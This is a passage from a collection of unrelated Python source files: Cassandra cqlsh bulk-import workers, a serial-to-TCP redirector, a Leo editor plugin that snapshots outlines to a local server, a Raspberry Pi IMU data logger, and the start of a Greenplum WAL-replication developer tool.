replicas. It is very important that we use the token values, which are primitive types, rather
than the tokens classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
# Note that metadata refresh is disabled by default and we currently do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return filter(lambda r: r.is_up is not False and r.datacenter == self.local_dc, shuffled) if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
exponential back-off if all eligible replicas already have too many in-flight requests.
"""
def __init__(self, parent):
DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
self.max_backoff_attempts = parent.max_backoff_attempts
self.max_inflight_messages = parent.max_inflight_messages
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
by sleeping an exponentially larger delay in case all connections to eligible replicas have
too many in flight requests.
"""
connections = ConnectionWrapper.connections
replicas = list(query.replicas) if hasattr(query, 'replicas') else []
replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
if r not in replicas])
if replicas:
def replica_is_not_overloaded(r):
if r.address in connections:
conn = connections[r.address]
return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
return True
for i in xrange(self.max_backoff_attempts):
for r in filter(replica_is_not_overloaded, replicas):
yield r
# the back-off starts at 10 ms (0.01 s) and can go up to 2^max_backoff_attempts steps of 10 ms;
# max_backoff_attempts is currently 12, so 2^12 = 4096 steps of 0.01 s = ~40 seconds
delay = randint(1, pow(2, i + 1)) * 0.01
printdebugmsg("All replicas busy, sleeping for %d second(s)..." % (delay,))
time.sleep(delay)
printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
"""
A wrapper to the driver default connection that helps in keeping track of messages in flight.
The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
is able to determine if a connection has too many in flight requests.
"""
connections = {}
def __init__(self, *args, **kwargs):
DefaultConnection.__init__(self, *args, **kwargs)
self.connections[self.host] = self
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = params['valid_columns']
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.ttl = options.copy['ttl']
self.max_inflight_messages = options.copy['maxinflightmessages']
self.max_backoff_attempts = options.copy['maxbackoffattempts']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(self),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=FallthroughRetryPolicy(), # we throw on timeouts and retry in the error callback
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0,
connection_class=ConnectionWrapper)
self._session = cluster.connect(self.ks)
self._session.default_timeout = None
return self._session
def run(self):
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
self.report_error(exc)
finally:
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
if self.ttl >= 0:
query += ' USING TTL %s' % (self.ttl,)
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
if self.ttl >= 0:
query += ' USING TTL %s' % (self.ttl,)
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
except Exception, exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception, exc:
print "Failed to make batch statement: {}".format(exc)
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch = self.maybe_inject_failures(batch)
if failed_batch:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
for row in batch['rows']:
where_clause = []
set_clause = []
for i, value in enumerate(row):
if i in conv.primary_key_indexes:
where_clause.append("%s=%s" % (self.valid_columns[i], value))
else:
set_clause.append("%s=%s+%s" % (self.valid_columns[i], self.valid_columns[i], value))
full_query_text = query % (','.join(set_clause), ' AND '.join(where_clause))
statement.add(full_query_text)
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more driver's code (BoundStatement.bind()).
"""
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(False, query % (','.join(r),), ()) for r in batch['rows']]
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception, err:
errors[err.message].append(r)
return None
converted_rows = filter(None, [convert_row(r) for r in rows])
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if this batch is a batch that is
supposed to cause a failure (failing_batch) or to terminate the worker process
(exit_batch). If not, return None so that the normal batch statement is built
and sent as usual.
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
return None # carry on as normal
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
it may not be possible, in this case it helps to increase the CHUNK SIZE but up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception, e:
errors[e.message].append(row)
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.iteritems():
if len(rows) > min_batch_size:
for i in xrange(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[filter_replicas(replicas[ring_pos])[:1]].extend(rows)
# Now send the batches by replica
for replicas, rows in rows_by_replica.iteritems():
for i in xrange(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
self.outmsg.send(ImportTaskError(err.__class__.__name__, err.message, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
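"""Track the rate of processed records and periodically log it, smoothing each new rate with the previous one."""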
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
remaining_time = self.update_interval - time_difference  # time left until the next update is due
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
|
serial2tcp.py
|
#(C)2002-2003 Chris Liechti <cliechti@gmx.net>
#redirect data from a TCP/IP connection to a serial port and vice versa
#requires Python 2.2 'cause socket.sendall is used
import sys
import os
import serial
import threading
import socket
import logging
import signal
from argparse import ArgumentParser
from serial.tools.list_ports import comports
import colorama
SERIAL_AUTO_VENDOR_ID = 0x0403
SERIAL_AUTO_PRODUCT_ID = 0x6010
def find_serial():
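"""Auto-select a serial port by scanning the available com ports for the expected USB vendor/product ids."""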
available = comports()
if len(available) == 0:
print("no com ports available - is board powered and connected?")
raise SystemExit
available = [ser for ser in available if ser.vid == SERIAL_AUTO_VENDOR_ID and ser.pid == SERIAL_AUTO_PRODUCT_ID]
if len(available) == 0:
print("no com port matching vendor/product ids available - is board powered and connected?")
raise SystemExit
if len(available) > 1:
# pick the lowest interface in multiple interface devices
if hasattr(available[0], 'device_path'):
device = min([(x.device_path.split('/')[:-1], x) for x in available])[1]
else:
device = min([(x.device, x) for x in available])[1]
else:
device = available[0]
comport = device.device
print("automatic comport selection: {}".format(comport))
return comport
log = logging.getLogger('serial2tcp')
log.setLevel(logging.ERROR)
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
ch.setFormatter(formatter)
log.addHandler(ch)
colorama.init()
RED_START = "\033[1;31m"
RED_END = "\033[0;0m"
verbose = False
class Redirector:
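"""Bridge a serial port and a TCP socket: a background thread copies serial->socket while the caller's thread copies socket->serial."""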
def __init__(self, serial, s):
self.serial = serial
self.socket = s
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 20 * 1024 * 1024)
def shortcut(self):
"""connect the serial port to the tcp port by copying everything
from one side to the other"""
self.alive = True
self.thread_read = threading.Thread(target=self.reader)
self.thread_read.setDaemon(1)
self.thread_read.start()
self.writer()
def reader(self):
"""loop forever and copy serial->socket"""
while self.alive:
try:
#read one, blocking
data = self.serial.read(1)
#look if there is more
n = self.serial.inWaiting()
if n:
#and get as much as possible
data = data + self.serial.read(n)
if data:
#if b'EM\x03' in data: print("probably an ACK")
#send it over TCP
self.socket.sendall(data)
except socket.error as msg:
log.error(msg)
#probably got disconnected
break
self.alive = False
def writer(self):
"""loop forever and copy socket->serial"""
while self.alive:
try:
data = self.socket.recv(1)
if not data:
break
self.serial.write(data) # get a bunch of bytes and send them
except socket.error as msg:
log.error(repr(msg))
break
except Exception as e:
log.critical(repr(e))
break
self.alive = False
self.thread_read.join()
def stop(self):
"""Stop copying"""
if self.alive:
self.alive = False
self.thread_read.join()
if __name__ == '__main__':
descr = 'WARNING: You have to allow connections only from the addresses ' \
'listed in the "--access-list" option, e.g. ' \
'--access-list="10.0.0.1, 172.16.0.1, 192.168.0.1"\n' \
'NOTICE: This service supports only ' \
'one tcp connection per instance.'
usage = "USAGE: %(prog)s [options]\n\nSimple Serial to Network (TCP/IP)" \
"redirector."
parser = ArgumentParser(usage=usage, description=descr)
parser.add_argument("-p", "--port", dest="serial",
help="Serial URL or port, a number, default = '/dev/tty0'", type=str, default='auto')
parser.add_argument("-b", "--baud", dest="baudrate",
help="Baudrate, default 115200", default=115200, type=int)
parser.add_argument("-r", "--rtscts", dest="rtscts",
help="Enable RTS/CTS flow control (default off)", action='store_true', default=False)
parser.add_argument("-x", "--xonxoff", dest="xonxoff",
help="Enable software flow control (default off)", action='store_true', default=False)
parser.add_argument("-P", "--localport", dest="port",
help="TCP/IP port on which to run the server (default 9100)", type=int, default=9100)
parser.add_argument("-l", "--listen", dest="listen",
help="Listen address on which to run the server (default '127.0.0.1')", type=str, default='127.0.0.1')
parser.add_argument(
'--access-list', dest='acl', type=str, default="127.0.0.1",
help="List of IP addresses e.g '127.0.0.1, 192.168.0.2'")
options = parser.parse_args()
if options.serial == 'auto':
options.serial = find_serial()
access_list = set([ip.strip(" ") for ip in options.acl.split(',')])
log.info("TCP/IP to Serial redirector (Ctrl-C to quit)")
try:
ser = serial.serial_for_url(
options.serial,
baudrate=options.baudrate,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
#required so that the reader thread can exit
timeout=1
)
except serial.SerialException as e:
log.fatal("Could not open serial port %s: %s" % (options.serial, e))
sys.exit(1)
# TODO: necessary?
ser.flushInput()
ser.flushOutput()
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((options.listen, options.port))
srv.listen(1)
def signal_handler(signal, frame):
pass
signal.signal(signal.SIGINT, signal_handler)
try:
connection, addr = srv.accept()
address, port = addr
log.info('Connecting with tcp://{0}:{1}'.format(address, port))
if address in access_list:
#enter console->serial loop
r = Redirector(ser, connection)
r.shortcut()
else:
log.error('Address {0} not in access list.'.format(address))
except socket.error as msg:
log.error(msg)
finally:
try:
connection.close()
log.info('Disconnecting')
except NameError:
pass
except Exception as e:
log.warning(repr(e))
|
history_tracer.py
|
#@+leo-ver=5-thin
#@+node:vitalije.20190928154420.1: * @file ../plugins/history_tracer.py
#@+<< docstring >>
#@+node:vitalije.20190928154420.2: ** << docstring >>
"""This plugin cooperates with leo-ver-serv utilty.
To install leo-ver-serv visit https://crates.io/crates/leo-ver-serv
In idle time, whenever user has no activity in last 5 seconds,
this plugin will send the snapshot of Leo outline to the local
leo-ver-serv server and it will record snapshot in sqlite3 database
named after the Leo file by adding '.history' to file name. For example
if you edit file /tmp/a.leo, history will be recorded in the file
/tmp/a.leo.history.
leo-ver-serv will also serve a small web application for displaying
outline and allows user to browse all recorded versions of the file.
leo-ver-serv requires as its first argument the name of a file
containing absolute paths to the Leo files that are tracked. A
suitable value for this argument is ~/.leo/.leoRecentFiles.txt
The second argument for leo-ver-serv is a port number. The same port
number must be in your settings.
@int history-tracer-port=8087
Author: vitalije(at)kviziracija.net
"""
#@-<< docstring >>
#@+<< imports >>
#@+node:vitalije.20190928154420.3: ** << imports >>
import datetime
import time
import threading
from urllib.request import urlopen
from urllib.error import URLError
from leo.core import leoGlobals as g
from leo.core.leoQt import QtCore
#
# Fail fast, right after all imports.
g.assertUi('qt') # May raise g.UiTypeException, caught by the plugins manager.
#@-<< imports >>
idle_checker = None
#@+others
#@+node:vitalije.20190928154420.4: ** init
def init():
"""Return True if the plugin has loaded successfully."""
ok = g.app.gui.guiName() == "qt"
if ok:
g.registerHandler(['command1', 'command2'], c12_hook)
g.registerHandler('start2', init_idle_checker)
g.plugin_signon(__name__)
return ok
#@+node:vitalije.20190928154420.6: ** c12_hook
def c12_hook(tag, keys):
c = keys.get('c')
c.user_dict['last_command_at'] = time.time()
#@+node:vitalije.20190928160510.1: ** IdleChecker
def init_idle_checker(tag, keys):
global idle_checker
class IdleChecker(QtCore.QObject):
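"""Every 5 seconds, snapshot any open outline whose last command happened more than 5 seconds ago and after its last snapshot."""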
def __init__(self):
QtCore.QObject.__init__(self)
self._tid = self.startTimer(5000)
def stop(self):
self.killTimer(self._tid)
def timerEvent(self, ev):
t = time.time()
for i, cx in enumerate(g.app.commanders()):
t1 = cx.user_dict.get('last_command_at', t)
t2 = cx.user_dict.get('last_snap_at', 0)
if t - t1 > 5 and t1 > t2:
cx.user_dict['last_snap_at'] = t
if save_snapshot(cx):
g.es('snap', i, cx.mFileName.rpartition('/')[2])
print("don't forget to launch leo-ver-serv!!!")
idle_checker = IdleChecker()
#@+node:vitalije.20190928160520.1: ** save_snapshot
def save_snapshot(c):
data = snap(c)
x = data.split('\n', 2)[2]
y = c.user_dict.get('last_snapshot_data')
if x == y:
return False
c.user_dict['last_snapshot_data'] = x
def pf():
t1 = time.perf_counter()
url = 'http://localhost:%d/add-snapshot'%c.config.getInt('history-tracer-port')
with urlopen(url, data=data.encode('utf8')) as resp:
try:
txt = resp.read().decode('utf8')
except URLError as e:
if 'refused' in str(e):
g.es('it seems that leo-ver-serv is not running', color='warning')
if txt == 'Unkown file':
g.es(c.mFileName, 'is not tracked by history_tracer plugin\n'
'You have to restart leo-ver-serv to accept new files',
color='warning')
ms = '%.2fms'%(1000 * (time.perf_counter() - t1))
print("save_snapshot:", data.partition('\n')[0], txt, 'in', ms)
threading.Thread(target=pf, name="snapshot-saver").start()
return True
#@+node:vitalije.20190928160538.1: ** snap
def snap(c):
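"""Serialize the outline as text: the file name and a UTC timestamp, one 'level gnx headline' line per node, a blank line, then a byte-length-prefixed gnx+body record for each node."""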
dt = datetime.datetime.utcnow()
buf = [c.mFileName, '\n', dt.strftime('%Y-%m-%dT%H:%M:%S.000000'), '\n']
nbuf = {}
def it(v, lev):
if v.gnx not in nbuf:
s = '%s\n%s'%(v.gnx,v.b)
n = len(s.encode('utf8'))
nbuf[v.gnx] = '%d %s'%(n, s)
yield v, lev
for ch in v.children:
yield from it(ch, lev+1)
for v, lev in it(c.hiddenRootNode, 0):
buf.append('%d %s %s\n'%(lev, v.fileIndex, v._headString))
buf.append('\n')
for gnx, hb in nbuf.items():
buf.append(hb)
return ''.join(buf)
#@-others
#@@language python
#@@tabwidth -4
#@-leo
|
csv_4VA.py
|
import numpy as np
from picamera import PiCamera
from tinkerforge.ip_connection import IPConnection
from tinkerforge.brick_imu_v2 import BrickIMUV2 as IMU
from math import pi
import csv, sys, threading, cv2, time
def imu_acq(freq, imu, d):
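"""Sample the IMU at roughly `freq` Hz for `d` seconds and append one CSV row per sample."""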
#csv header configuration
Entete_csv = [
'timestamp',
'omega_x', 'omega_y', 'omega_z',
'alpha_x' , 'alpha_y', 'alpha_z',
]
path_csv = '/home/pi/Projet_Stage/Variance_Allan'
csv_file = open( path_csv + '/imu_va.csv', 'w')
csv_writer = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
csv_writer.writerow(Entete_csv)
t0 = time.time()
t1 = 0
while t1 - t0 <= d:
time.sleep(1.0/freq)
xpp, ypp, zpp = imu.get_acceleration()
thp, Php, Psp = imu.get_angular_velocity()
row = [
str(time.time_ns()), # timestamp in nanoseconds since the epoch
str((thp/16)), str((Php/16)), str((Psp/16)), # angular velocities (the raw Tinkerforge values are in 1/16 °/s, so these are °/s)
str(xpp/100), str(ypp/100), str(zpp/100), # accelerations in m/s^2
]
csv_writer.writerow(row)
t1 = time.time()
"""
Acquisition parameters (sampling frequency and duration):
"""
freq_imu = 100 #Hz (imu)
d = 7200
#IMU connection
HOST = "localhost"
PORT = 4223
UID = "6yoKcp"
#connection to brick, and binding
ipcon = IPConnection()
imu = IMU(UID, ipcon)
ipcon.connect(HOST, PORT)
# blink the LEDs a few times to show that the IMU is connected
imu.leds_off()
for i in range(0,3):
imu.leds_on()
time.sleep(0.2)
imu.leds_off()
time.sleep(0.1)
# choose the sensor fusion mode (see the options below) and read it back to confirm
"""
BrickIMUV2.SENSOR_FUSION_OFF = 0
BrickIMUV2.SENSOR_FUSION_ON = 1
BrickIMUV2.SENSOR_FUSION_ON_WITHOUT_MAGNETOMETER = 2
BrickIMUV2.SENSOR_FUSION_ON_WITHOUT_FAST_MAGNETOMETER_CALIBRATION = 3
"""
imu.set_sensor_fusion_mode(0)
a = imu.get_sensor_fusion_mode()
print('Fusion mode : ',a)
print('IMU data frequency : ' + str(freq_imu) + 'Hz')
print('time of experiment : ' + str(d/3600) + 'h')
"""
Main: record gyroscope and accelerometer data
"""
input("Click entr to begin recording...")
#Creating thread
th1 = threading.Thread(target= imu_acq, args = (freq_imu, imu, d))
#starting thread
th1.start()
print("Logger started...")
|
gpsegwalrep.py
|
#! /usr/bin/env python
"""
Initialize, start, stop, or destroy WAL replication mirror segments.
============================= DISCLAIMER =============================
This is a developer tool to assist with development of WAL replication
for mirror segments. This tool is not meant to be used in production.
It is suggested to only run this tool against a gpdemo cluster that
was initialized with no FileRep mirrors.
Example:
WITH_MIRRORS=false make create-demo-cluster
======================================================================
Assumptions:
1. Greenplum cluster was compiled with --enable-segwalrep
2. Greenplum cluster was initialized without mirror segments.
3. Cluster is all on one host
4. Greenplum environment is all setup (greenplum_path.sh, MASTER_DATA_DIRECTORY, PGPORT, etc.)
5. Greenplum environment is started
6. Greenplum environment is the same throughout tool usage
Assuming all of the above, you can just run the tool as so:
./gpsegwalrep.py [init|start|stop|destroy]
"""
import argparse
import os
import sys
import subprocess
import threading
import datetime
import time
from gppylib.db import dbconn
PRINT_LOCK = threading.Lock()
THREAD_LOCK = threading.Lock()
def runcommands(commands, thread_name, command_finish, exit_on_error=True):
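"""Run each shell command in turn, collect its output and print it under thread_name; exit on the first failure unless exit_on_error is False."""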
output = []
for command in commands:
try:
output.append('%s: Running command... %s' % (datetime.datetime.now(), command))
with THREAD_LOCK:
output = output + subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True).split('\n')
except subprocess.CalledProcessError, e:
output.append(str(e))
output.append(e.output)
if exit_on_error:
with PRINT_LOCK:
for line in output:
print '%s: %s' % (thread_name, line)
print ''
sys.exit(e.returncode)
output.append('%s: %s' % (datetime.datetime.now(), command_finish))
with PRINT_LOCK:
for line in output:
print '%s: %s' % (thread_name, line)
print ''
def displaySegmentConfiguration():
commands = []
commands.append("psql postgres -c \"select * from gp_segment_configuration order by content, dbid\"")
runcommands(commands, "", "")
class InitMirrors():
''' Initialize the WAL replication mirror segment '''
def __init__(self, cluster_config, hostname):
self.clusterconfig = cluster_config
self.segconfigs = cluster_config.get_seg_configs()
self.hostname = hostname
def initThread(self, segconfig, user):
commands = []
primary_port = segconfig.port
primary_dir = segconfig.fselocation
mirror_contentid = segconfig.content
mirror_dir = segconfig.fselocation.replace('dbfast', 'dbfast_mirror')
mirror_port = primary_port + 10000
commands.append("echo 'host replication %s samenet trust' >> %s/pg_hba.conf" % (user, primary_dir))
commands.append("pg_ctl -D %s reload" % primary_dir)
# 1. create base backup
commands.append("pg_basebackup -x -R -c fast -E ./pg_log -E ./db_dumps -E ./gpperfmon/data -E ./gpperfmon/logs -D %s -h %s -p %d" % (mirror_dir, self.hostname, primary_port))
commands.append("mkdir %s/pg_log; mkdir %s/pg_xlog/archive_status" % (mirror_dir, mirror_dir))
# 2. update catalog
catalog_update_query = "select pg_catalog.gp_add_segment_mirror(%d::int2, '%s', '%s', %d, -1, '{pg_system, %s}')" % (mirror_contentid, self.hostname, self.hostname, mirror_port, mirror_dir)
commands.append("PGOPTIONS=\"-c gp_session_role=utility\" psql postgres -c \"%s\"" % catalog_update_query)
thread_name = 'Mirror content %d' % mirror_contentid
command_finish = 'Initialized mirror at %s' % mirror_dir
runcommands(commands, thread_name, command_finish)
def run(self):
# Assume db user is current user
user = subprocess.check_output(["whoami"]).rstrip('\n')
initThreads = []
for segconfig in self.segconfigs:
assert(segconfig.preferred_role == GpSegmentConfiguration.ROLE_PRIMARY)
assert(segconfig.content != GpSegmentConfiguration.MASTER_CONTENT_ID)
thread = threading.Thread(target=self.initThread, args=(segconfig, user))
thread.start()
initThreads.append(thread)
for thread in initThreads:
thread.join()
class StartInstances():
''' Start a greenplum segment '''
def __init__(self, cluster_config, host, wait=False):
self.clusterconfig = cluster_config
self.segconfigs = cluster_config.get_seg_configs()
self.host = host
self.wait = wait
def startThread(self, segconfig):
commands = []
waitstring = ''
dbid = segconfig.dbid
contentid = segconfig.content
segment_port = segconfig.port
segment_dir = segconfig.fselocation
segment_role = StartInstances.getRole(contentid)
# Need to set the dbid to 0 on segments to prevent use in mmxlog records
if contentid != GpSegmentConfiguration.MASTER_CONTENT_ID:
dbid = 0
